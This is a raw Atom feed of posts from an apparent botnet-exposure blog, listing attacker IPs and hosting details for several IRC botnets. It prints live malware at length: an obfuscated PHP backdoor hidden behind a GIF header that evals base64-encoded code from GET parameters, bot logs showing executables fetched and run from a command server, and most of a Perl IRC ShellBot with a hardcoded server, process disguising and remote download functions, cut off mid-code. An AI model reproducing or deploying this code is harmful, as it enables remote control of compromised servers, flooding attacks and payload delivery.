href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4372225152478796214'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/1186922081irc-botnet-hosted-in-viet-nam.html' title='118.69.220.81(irc botnet hosted in Viet Nam Ip Range For Xdsl Iptv Fixed Phone Service At Hcmc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4101028941446659815</id><published>2012-01-03T16:25:00.000+01:00</published><updated>2012-01-03T16:25:59.504+01:00</updated><title type='text'>picasa.com.syscommx.com(hecker using United States Fulshear Landis Holdings Inc)</title><content type='html'>Today i noticed that a big hecker tryed to heck into one of my websites&lt;br /&gt;here i m posting the script used to atack the web site &lt;br /&gt;u have to decrypt it if u want to know more lol&lt;br /&gt;&lt;br /&gt;First he use this website to host his shit:&lt;br /&gt;http://picasa.com.syscommx.com/&lt;br /&gt;and his l33t hecker script is this one:&lt;br /&gt;http://picasa.com.syscommx.com/bodat.php&lt;br /&gt;&lt;br /&gt;now some more search into dns:&lt;br /&gt;Resolved : [picasa.com.syscommx.com] To [69.73.173.227]&lt;br /&gt;Resolved : [nocdirect.com] To [69.73.138.35]&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;GIF89a&amp;#1;?&amp;#1;????&amp;amp;#255;&amp;amp;#255;&amp;amp;#255;!&amp;amp;#249;&amp;#4;&amp;#1;????,????&amp;#1;?&amp;#1;??&amp;#2;&amp;#2;D&amp;#1;?;?&amp;lt;?php&lt;br /&gt;@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];&lt;br /&gt;if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE='))); die; }&lt;br /&gt;elseif (isset($osc)) { eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }&lt;br /&gt;else { eval(gzinflate(base64_decode('pVNdi9swEHw/uP+wEQbFkCZpy0G5xKGhJEdpoAX3nkIwii3XAtsSllwnd+S/V7LsOL409KF+8cfOjGdnV07Ic0VzBR5IVTAhUyITKodO8OO7/3OLmzLeuTNwwpilVCPPRfOOd7pSvqmUTeX+joYJBzzfL+b7YoHHIhFBmZOMDt0xNp/mk/0Cd7iYFxmQUDGeewhBRlXCIw8JLhUCmofqKKiHsjJVTJBCTQz+XUQUQWBUPUQqBCyq75e6ih4UKSixqLZpqY6p5lQsUsnjw6cHcZgllP1K1OOH6VQctMLYabDa7aQVsb104iwXpQJrzWBaL3U+CCR70S/vpwh+k7TUjzmtTMWEga51LDcI9Y+UZltZWe4zpmxrQSnSs9YXC7tlxzqwkpduPk7R4qbv8n98a3OcRP/0/Wxhev5mhLUai89r13Sv1+71/g705SQkj+oVi7mg+dDu4ghwhd2ZhRi6RbUk+xWGcVUwRdvqCNqZuuB5HqyXG3/lwivU3SC9qjbTdt+flk/LjVlTM3U0g1MnTlNJbxP952/+yofBYHDJhjhMuTy7ad2femK4E1tfebDbZ3yc+qHZ6LvQdO1zyMVRI9ZfNyt/i+2x3GKVicDMC+9GzeF1ewnY6bTn+rqRfhRvY+iza+9/J5/+AA=='))); }&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/69.73.173.227&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4101028941446659815?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4101028941446659815/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/picasacomsyscommxcomhecker-using-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4101028941446659815'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4101028941446659815'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/picasacomsyscommxcomhecker-using-united.html' title='picasa.com.syscommx.com(hecker using United States Fulshear Landis Holdings Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4096447437353825019</id><published>2012-01-03T13:25:00.000+01:00</published><updated>2012-01-03T13:25:50.410+01:00</updated><title type='text'>205.234.187.241(irc botnet hosted in United States Chicago Hostforweb Inc)</title><content type='html'>205.234.187.241:2345 &lt;br /&gt;Nick: New[AUT|00|P|64491]&lt;br /&gt;Username: XP-9383&lt;br /&gt;Joined Channel: #!loco!&lt;br /&gt;Channel Topic for Channel #!loco!: ".m.s|.m.e Foto http://goo.gl/TYFFS?="&lt;br /&gt;Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."&lt;br /&gt;Private Message to Channel #!loco!: "[M]: Thread Disabled."&lt;br /&gt;Private Message to User New[AUT|00|P|64491]: ".hp http://domredi.com/1/"&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/205.234.187.241&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4096447437353825019?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4096447437353825019/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/205234187241irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4096447437353825019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4096447437353825019'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/205234187241irc-botnet-hosted-in-united.html' title='205.234.187.241(irc botnet hosted in United States Chicago Hostforweb Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3652115972440291903</id><published>2012-01-02T19:39:00.000+01:00</published><updated>2012-01-02T19:39:04.479+01:00</updated><title type='text'>31.210.98.14(mIRC bots hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)</title><content type='html'>Remote Host Port Number&lt;br /&gt;31.210.98.14 6667&lt;br /&gt;&lt;br /&gt;NICK Maceachern&lt;br /&gt;PING Maceachern&lt;br /&gt;NICK _A_R_Z_U_&lt;br /&gt;USER Woods-Powe "" "p2c.ekolik.net" :biliamee&lt;br /&gt;USERHOST _A_R_Z_U_&lt;br /&gt;MODE #seo&lt;br /&gt;JOIN #!x!&lt;br /&gt;MODE #!x!&lt;br /&gt;USER Peters "" "p2c.ekolik.net" :coralyn&lt;br /&gt;PING _A_R_Z_U_&lt;br /&gt;USERHOST Maceachern&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.210.98.14&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3652115972440291903?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3652115972440291903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/312109814mirc-bots-hosted-in-turkey.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3652115972440291903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3652115972440291903'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/312109814mirc-bots-hosted-in-turkey.html' title='31.210.98.14(mIRC bots hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2318433309580841232</id><published>2012-01-01T19:41:00.001+01:00</published><updated>2012-01-03T20:13:47.904+01:00</updated><title type='text'>2.byinter.net(ngrBot hosted in United States Stafford Singlehop Inc)</title><content type='html'>C&amp;C Server: 69.175.32.237:6667&lt;br /&gt;Server Password: &lt;br /&gt;Username: msgvvei&lt;br /&gt;Nickname: A[DE-XPC]msgvvei&lt;br /&gt;Channel: #KCA (Password: KCA) &lt;br /&gt;Channeltopic: :!j #X&lt;br /&gt;&lt;br /&gt;Now talking in #X&lt;br /&gt;Topic On: [ #X ] [ !j #XX !mdns http://69.175.32.237/~face/av.txt !mod usbi on ]&lt;br /&gt;Topic By: [ KCA ]&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;PRIVMSG #aryan :[AryaN]: Successfully Executed Process: "C:\Documents and Settings\UserName\Application Data\10915679120753.exe"&lt;br /&gt;NICK A[US-XPC]zjqsrws&lt;br /&gt;USER zjqsrws 0 0 :zjqsrws&lt;br /&gt;JOIN #KCA KCA&lt;br /&gt;JOIN #X&lt;br /&gt;JOIN #XX&lt;br /&gt;PRIVMSG #KCA :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)&lt;br /&gt;PRIVMSG #XX :[d="http://69.175.32.237/~face/kca2.exe" s="30208 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0&lt;br /&gt;NICK n{KCA}XP|USA|254521&lt;br /&gt;USER 2545 "" "TsGh" :2545&lt;br /&gt;JOIN #KCA2 KCA&lt;br /&gt;NICK KCA{US-XP-x86}0466005&lt;br /&gt;USER 0466005 "" "0466005" :0466005&lt;br /&gt;MODE KCA{US-XP-x86}0466005 +iMm&lt;br /&gt;JOIN #aryan KCA&lt;br /&gt;PRIVMSG #aryan :[AryaN]: Downloading File: "http://69.175.32.237/~face/ng.exe"&lt;br /&gt;PRIVMSG #aryan :[AryaN]: Successfully Downloaded File To: "C:\Documents and Settings\UserName\Application Data\10915679120753.exe"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/69.175.32.237&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2318433309580841232?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2318433309580841232/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2012/01/2byinternetngrbot-hosted-in-united.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2318433309580841232'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2318433309580841232'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2012/01/2byinternetngrbot-hosted-in-united.html' title='2.byinter.net(ngrBot hosted in United States Stafford Singlehop Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8145212110713785976</id><published>2012-01-01T01:46:00.000+01:00</published><updated>2012-01-01T01:46:06.516+01:00</updated><title type='text'>91.220.127.238(Linux Bots hosted in United Kingdom Vooservers Limited)</title><content type='html'>&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;#!/usr/bin/perl&lt;br /&gt;#  ShellBOT&lt;br /&gt;#  0ldW0lf - oldwolf@atrix-team.org&lt;br /&gt;#      - www.atrix-team.org&lt;br /&gt;# Stealth ShellBot Vers?o 0.2 by Thiago X&lt;br /&gt;# Feito para ser usado em grandes redes de IRC sem IRCOP enchendo o saco :)&lt;br /&gt;# Mudan?as:&lt;br /&gt;#          - O Bot pega o nick/ident/name em uma URL e entra no IRC disfar?ado :);&lt;br /&gt;#          - O Bot agora responde PINGs;&lt;br /&gt;#          - Voc? pode definir o prefixo dos comandos nas configura??es;&lt;br /&gt;#          - Agora o Bot procurar pelo processo do apache para rodar como o apache :D;&lt;br /&gt;# Comandos:&lt;br /&gt;#          - Adicionado comando !estatisticas &amp;lt;on/off&amp;gt;;&lt;br /&gt;#          - Alterado o comando @pacota para @oldpack;&lt;br /&gt;#          - Adicionado dois novos pacotadores: @udp &amp;lt;ip&amp;gt; &amp;lt;porta&amp;gt; &amp;lt;tempo&amp;gt; e @udpfaixa &amp;lt;faixa de ip&amp;gt; &amp;lt;porta&amp;gt; &amp;lt;tempo&amp;gt;;&lt;br /&gt;#          - Adicionado um novo portscan -&amp;gt; @fullportscan &amp;lt;ip&amp;gt; &amp;lt;porta inicial&amp;gt; &amp;lt;porta final&amp;gt;;&lt;br /&gt;#          - Adicionado comando @conback &amp;lt;ip&amp;gt; &amp;lt;porta&amp;gt; com suporte para Windows/Unix :D;&lt;br /&gt;#          - Adicionado comando: !sair para finalizar o bot;&lt;br /&gt;#          - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;&lt;br /&gt;#          - Adicionado comando !entra &amp;lt;canal&amp;gt; &amp;lt;tempo&amp;gt; e !sai &amp;lt;canal&amp;gt; &amp;lt;tempo&amp;gt;;&lt;br /&gt;#          - Adicionado comando @download &amp;lt;url&amp;gt; &amp;lt;arquivo a ser salvo&amp;gt;;&lt;br /&gt;#          - Adicionado comando !pacotes &amp;lt;on/off&amp;gt; para ativar/desativar pacotes :);&lt;br /&gt;&lt;br /&gt;########## CONFIGURACAO ############&lt;br /&gt;my $processo = 'xXx';&lt;br /&gt;if (`ps aux` =~ /xXx/)&lt;br /&gt;{&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;$servidor='91.220.127.238' unless $servidor;&lt;br /&gt;my $porta='6667';&lt;br /&gt;my @canais=(&amp;quot;#&amp;quot;);&lt;br /&gt;my @adms=(&amp;quot;kuba&amp;quot;,&amp;quot;alan&amp;quot;);&lt;br /&gt;&lt;br /&gt;# Anti Flood ( 6/3 Recomendado )&lt;br /&gt;my $linas_max=10;&lt;br /&gt;my $sleep=3;&lt;br /&gt;&lt;br /&gt;my $nick = getnick();&lt;br /&gt;my $ircname = getnick();&lt;br /&gt;my $realname = getnick();&lt;br /&gt;&lt;br /&gt;my $acessoshell = 1;&lt;br /&gt;######## Stealth ShellBot ##########&lt;br /&gt;my $prefixo = &amp;quot;!all&amp;quot;;&lt;br /&gt;my $estatisticas = 0;&lt;br /&gt;my $pacotes = 1;&lt;br /&gt;####################################&lt;br /&gt;&lt;br /&gt;my $VERSAO = '0.2a';&lt;br /&gt;&lt;br /&gt;$SIG{'INT'} = 'IGNORE';&lt;br /&gt;$SIG{'HUP'} = 'IGNORE';&lt;br /&gt;$SIG{'TERM'} = 'IGNORE';&lt;br /&gt;$SIG{'CHLD'} = 'IGNORE';&lt;br /&gt;$SIG{'PS'} = 'IGNORE';&lt;br /&gt;&lt;br /&gt;use IO::Socket;&lt;br /&gt;use Socket;&lt;br /&gt;use IO::Select;&lt;br /&gt;chdir(&amp;quot;/&amp;quot;);&lt;br /&gt;$servidor=&amp;quot;$ARGV[0]&amp;quot; if $ARGV[0];&lt;br /&gt;$0=&amp;quot;$processo&amp;quot;.&amp;quot;\0&amp;quot;;&lt;br /&gt;my $pid=fork;&lt;br /&gt;exit if $pid;&lt;br /&gt;die &amp;quot;Problema com o fork: $!&amp;quot; unless defined($pid);&lt;br /&gt;&lt;br /&gt;my %irc_servers;&lt;br /&gt;my %DCC;&lt;br /&gt;my $dcc_sel = new IO::Select-&amp;gt;new();&lt;br /&gt;&lt;br /&gt;#####################&lt;br /&gt;# Stealth Shellbot  #&lt;br /&gt;#####################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sub getnick {&lt;br /&gt;  #my $retornonick = &amp;amp;_get(&amp;quot;http://www.freewebs.com/alezinn/names.txt&amp;quot;);&lt;br /&gt;  return &amp;quot;&amp;#124;&amp;#124;&amp;quot;.int(rand(1000));&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sub getident {&lt;br /&gt;  my $retornoident = &amp;amp;_get(&amp;quot;http://www.minpop.com/sk12pack/idents.php&amp;quot;);&lt;br /&gt;  my $identchance = int(rand(100));&lt;br /&gt;  if ($identchance &amp;gt; 30) {&lt;br /&gt;     return $nick;&lt;br /&gt;  } else {&lt;br /&gt;     return $retornoident;&lt;br /&gt;  }&lt;br /&gt;  return $retornoident;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub getname {&lt;br /&gt;  my $retornoname = &amp;amp;_get(&amp;quot;http://www.minpop.com/sk12pack/names.php&amp;quot;);&lt;br /&gt;  return $retornoname;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o&lt;br /&gt;sub getident2 {&lt;br /&gt;        my $length=shift;&lt;br /&gt;        $length = 3 if ($length &amp;lt; 3);&lt;br /&gt;&lt;br /&gt;        my @chars=('a'..'z','A'..'Z','1'..'9');&lt;br /&gt;        foreach (1..$length)&lt;br /&gt;        {&lt;br /&gt;                $randomstring.=$chars[rand @chars];&lt;br /&gt;        }&lt;br /&gt;        return $randomstring;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub getstore ($$)&lt;br /&gt;{&lt;br /&gt;  my $url = shift;&lt;br /&gt;  my $file = shift;&lt;br /&gt;&lt;br /&gt;  $http_stream_out = 1;&lt;br /&gt;  open(GET_OUTFILE, &amp;quot;&amp;gt; $file&amp;quot;);&lt;br /&gt;  %http_loop_check = ();&lt;br /&gt;  _get($url);&lt;br /&gt;  close GET_OUTFILE;&lt;br /&gt;  return $main::http_get_result;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub _get&lt;br /&gt;{&lt;br /&gt;  my $url = shift;&lt;br /&gt;  my $proxy = &amp;quot;&amp;quot;;&lt;br /&gt;  grep {(lc($_) eq &amp;quot;http_proxy&amp;quot;) &amp;amp;&amp;amp; ($proxy = $ENV{$_})} keys %ENV;&lt;br /&gt;  if (($proxy eq &amp;quot;&amp;quot;) &amp;amp;&amp;amp; $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {&lt;br /&gt;    my $host = $1;&lt;br /&gt;    my $port = $2 &amp;#124;&amp;#124; 80;&lt;br /&gt;    my $path = $3;&lt;br /&gt;    $path = &amp;quot;/&amp;quot; unless defined($path);&lt;br /&gt;    return _trivial_http_get($host, $port, $path);&lt;br /&gt;  } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {&lt;br /&gt;    my $host = $1;&lt;br /&gt;    my $port = $2;&lt;br /&gt;    my $path = $url;&lt;br /&gt;    return _trivial_http_get($host, $port, $path);&lt;br /&gt;  } else {&lt;br /&gt;    return undef;&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sub _trivial_http_get&lt;br /&gt;{&lt;br /&gt;  my($host, $port, $path) = @_;&lt;br /&gt;  my($AGENT, $VERSION, $p);&lt;br /&gt;  #print &amp;quot;HOST=$host, PORT=$port, PATH=$path\n&amp;quot;;&lt;br /&gt;&lt;br /&gt;  $AGENT = &amp;quot;get-minimal&amp;quot;;&lt;br /&gt;  $VERSION = &amp;quot;20000118&amp;quot;;&lt;br /&gt;&lt;br /&gt;  $path =~ s/ /%20/g;&lt;br /&gt;&lt;br /&gt;  require IO::Socket;&lt;br /&gt;  local($^W) = 0;&lt;br /&gt;  my $sock = IO::Socket::INET-&amp;gt;new(PeerAddr =&amp;gt; $host,&lt;br /&gt;                                   PeerPort =&amp;gt; $port,&lt;br /&gt;                                   Proto   =&amp;gt; 'tcp',&lt;br /&gt;                                   Timeout  =&amp;gt; 60) &amp;#124;&amp;#124; return;&lt;br /&gt;  $sock-&amp;gt;autoflush;&lt;br /&gt;  my $netloc = $host;&lt;br /&gt;  $netloc .= &amp;quot;:$port&amp;quot; if $port != 80;&lt;br /&gt;  my $request = &amp;quot;GET $path HTTP/1.0\015\012&amp;quot;&lt;br /&gt;              . &amp;quot;Host: $netloc\015\012&amp;quot;&lt;br /&gt;              . &amp;quot;User-Agent: $AGENT/$VERSION/u\015\012&amp;quot;;&lt;br /&gt;  $request .= &amp;quot;Pragma: no-cache\015\012&amp;quot; if ($main::http_no_cache);&lt;br /&gt;  $request .= &amp;quot;\015\012&amp;quot;;&lt;br /&gt;  print $sock $request;&lt;br /&gt;&lt;br /&gt;  my $buf = &amp;quot;&amp;quot;;&lt;br /&gt;  my $n;&lt;br /&gt;  my $b1 = &amp;quot;&amp;quot;;&lt;br /&gt;  while ($n = sysread($sock, $buf, 8*1024, length($buf))) {&lt;br /&gt;    if ($b1 eq &amp;quot;&amp;quot;) { # first block?&lt;br /&gt;      $b1 = $buf;         # Save this for errorcode parsing&lt;br /&gt;      $buf =~ s/.+?\015?\012\015?\012//s;      # zap header&lt;br /&gt;    }&lt;br /&gt;    if ($http_stream_out) { print GET_OUTFILE $buf; $buf = &amp;quot;&amp;quot;; }&lt;br /&gt;  }&lt;br /&gt;  return undef unless defined($n);&lt;br /&gt;&lt;br /&gt;  $main::http_get_result = 200;&lt;br /&gt;  if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {&lt;br /&gt;    $main::http_get_result = $1;&lt;br /&gt;    # print &amp;quot;CODE=$main::http_get_result\n$b1\n&amp;quot;;&lt;br /&gt;    if ($main::http_get_result =~ /^30[1237]/ &amp;amp;&amp;amp; $b1 =~ /\012Location:\s*(\S+)/&lt;br /&gt;) {&lt;br /&gt;      # redirect&lt;br /&gt;      my $url = $1;&lt;br /&gt;      return undef if $http_loop_check{$url}++;&lt;br /&gt;      return _get($url);&lt;br /&gt;    }&lt;br /&gt;    return undef unless $main::http_get_result =~ /^2/;&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;  return $buf;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#############################&lt;br /&gt;#  B0tchZ na veia ehehe :P  #&lt;br /&gt;#############################&lt;br /&gt;&lt;br /&gt;$sel_cliente = IO::Select-&amp;gt;new();&lt;br /&gt;sub sendraw {&lt;br /&gt;  if ($#_ == '1') {&lt;br /&gt;    my $socket = $_[0];&lt;br /&gt;    print $socket &amp;quot;$_[1]\n&amp;quot;;&lt;br /&gt;  } else {&lt;br /&gt;      print $IRC_cur_socket &amp;quot;$_[0]\n&amp;quot;;&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub conectar {&lt;br /&gt;   my $meunick = $_[0];&lt;br /&gt;   my $servidor_con = $_[1];&lt;br /&gt;   my $porta_con = $_[2];&lt;br /&gt;&lt;br /&gt;   my $IRC_socket = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;&amp;quot;tcp&amp;quot;, PeerAddr=&amp;gt;&amp;quot;$servidor_con&amp;quot;, PeerPort=&amp;gt;$porta_con) or return(1);&lt;br /&gt;   if (defined($IRC_socket)) {&lt;br /&gt;     $IRC_cur_socket = $IRC_socket;&lt;br /&gt;&lt;br /&gt;     $IRC_socket-&amp;gt;autoflush(1);&lt;br /&gt;     $sel_cliente-&amp;gt;add($IRC_socket);&lt;br /&gt;&lt;br /&gt;     $irc_servers{$IRC_cur_socket}{'host'} = &amp;quot;$servidor_con&amp;quot;;&lt;br /&gt;     $irc_servers{$IRC_cur_socket}{'porta'} = &amp;quot;$porta_con&amp;quot;;&lt;br /&gt;     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;&lt;br /&gt;     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket-&amp;gt;sockhost;&lt;br /&gt;     nick(&amp;quot;$meunick&amp;quot;);&lt;br /&gt;     sendraw(&amp;quot;USER $ircname &amp;quot;.$IRC_socket-&amp;gt;sockhost.&amp;quot; $servidor_con :$realname&amp;quot;);&lt;br /&gt;     sleep 2;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;my $line_temp;&lt;br /&gt;while( 1 ) {&lt;br /&gt;   while (!(keys(%irc_servers))) { conectar(&amp;quot;$nick&amp;quot;, &amp;quot;$servidor&amp;quot;, &amp;quot;$porta&amp;quot;, &amp;quot;polnet&amp;quot;); }&lt;br /&gt;   delete($irc_servers{''}) if (defined($irc_servers{''}));&lt;br /&gt;   &amp;amp;DCC::connections;&lt;br /&gt;   my @ready = $sel_cliente-&amp;gt;can_read(0.6);&lt;br /&gt;   next unless(@ready);&lt;br /&gt;   foreach $fh (@ready) {&lt;br /&gt;     $IRC_cur_socket = $fh;&lt;br /&gt;     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};&lt;br /&gt;     $nread = sysread($fh, $msg, 4096);&lt;br /&gt;     if ($nread == 0) {&lt;br /&gt;        $sel_cliente-&amp;gt;remove($fh);&lt;br /&gt;        $fh-&amp;gt;close;&lt;br /&gt;        delete($irc_servers{$fh});&lt;br /&gt;     }&lt;br /&gt;     @lines = split (/\n/, $msg);&lt;br /&gt;&lt;br /&gt;     for(my $c=0; $c&amp;lt;= $#lines; $c++) {&lt;br /&gt;       $line = $lines[$c];&lt;br /&gt;       $line=$line_temp.$line if ($line_temp);&lt;br /&gt;       $line_temp='';&lt;br /&gt;       $line =~ s/\r$//;&lt;br /&gt;       unless ($c == $#lines) {&lt;br /&gt;         parse(&amp;quot;$line&amp;quot;);&lt;br /&gt;       } else {&lt;br /&gt;           if ($#lines == 0) {&lt;br /&gt;             parse(&amp;quot;$line&amp;quot;);&lt;br /&gt;           } elsif ($lines[$c] =~ /\r$/) {&lt;br /&gt;               parse(&amp;quot;$line&amp;quot;);&lt;br /&gt;           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {&lt;br /&gt;               parse(&amp;quot;$line&amp;quot;);&lt;br /&gt;           } else {&lt;br /&gt;               $line_temp = $line;&lt;br /&gt;           }&lt;br /&gt;       }&lt;br /&gt;      }&lt;br /&gt;   }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub parse {&lt;br /&gt;   my $servarg = shift;&lt;br /&gt;   if ($servarg =~ /^PING \:(.*)/) 